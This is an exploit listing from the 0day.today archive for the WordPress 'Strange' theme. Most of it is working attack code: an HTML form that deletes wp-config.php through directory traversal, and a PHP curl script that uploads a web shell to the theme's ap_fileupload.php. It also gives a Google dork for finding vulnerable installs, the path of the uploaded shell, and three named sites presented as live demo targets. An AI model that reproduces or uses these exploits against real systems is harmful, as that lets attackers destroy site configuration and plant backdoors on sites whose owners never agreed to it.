Wordpress Theme Strange File Upload / File Deletion

2014-09-21T00:00:00
ID 1337DAY-ID-22674
Type zdt
Reporter null_pointer
Modified 2014-09-21T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            Exploit Title : Wordpress Theme Strange File Upload / File Deletion

Exploit Author : NULL_Pointer

Contact : https://www.facebook.com/xenith.gianni

Date : 21/09/2014

Github Mirror : https://github.com/nzajt/New-Life-Office/tree/master/dev/wp-content/themes/ut-strange

Version : 3.1

Google Dork : inurl:/wp-content/themes/ut-strange/

Tested on : Linux, Windows 7

--------------------------------------------------------------

Wordpress Theme Strange have suffers from a File Upload and File Deletion Vulnerability.

1. File Deletion :

This issue allows an attacker to influence calls to the 'unlink()' function and delete arbitrary files. Due to a lack of input validation, an attacker can supply directory traversal sequences followed by an arbitrary file name to delete specific files.

Exploit Code (HTML) :

<form action="http://127.0.0.1/wp-content/themes/ut-strange/addpress/includes/ap_fileupload.php" method="POST">
<input type="hidden" name="action" value="deletefile">
<input type="text" name="file" value="../../../wp-config.php">
<input type="submit" value="Delete It"> 
</form>

2. File Upload :

Exploit Code (PHP) :

<?php

if (!isset ($argv[1], $argv[2]))
	die ("Usage : php {$argv[0]} http://127.0.0.1/ my_shell.php");
	
if (!file_exists ($argv[2]))
	die ("Fatal Error : File \"{$argv[2]}\" Not Found...\n");

$post = array
(
	"file_upload" => "@".$argv[2],
	"themeroot"   => "."
	//,"dir"=>"."
);

$ch = curl_init ($argv[1]."/wp-content/themes/ut-strange/addpress/includes/ap_fileupload.php");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);

echo $data;

?>

Shell Path : http://127.0.0.1/wp-content/themes/ut-strange/addpress/includes/[SHELL_NAME]

Demo Sites :

http://www.estudio34.com
http://www.argela.com
http://www.gcntv.net

Proof Video : http://www.youtube.com/watch?v=eVHITnvYjqs

#  0day.today [2016-04-20]  #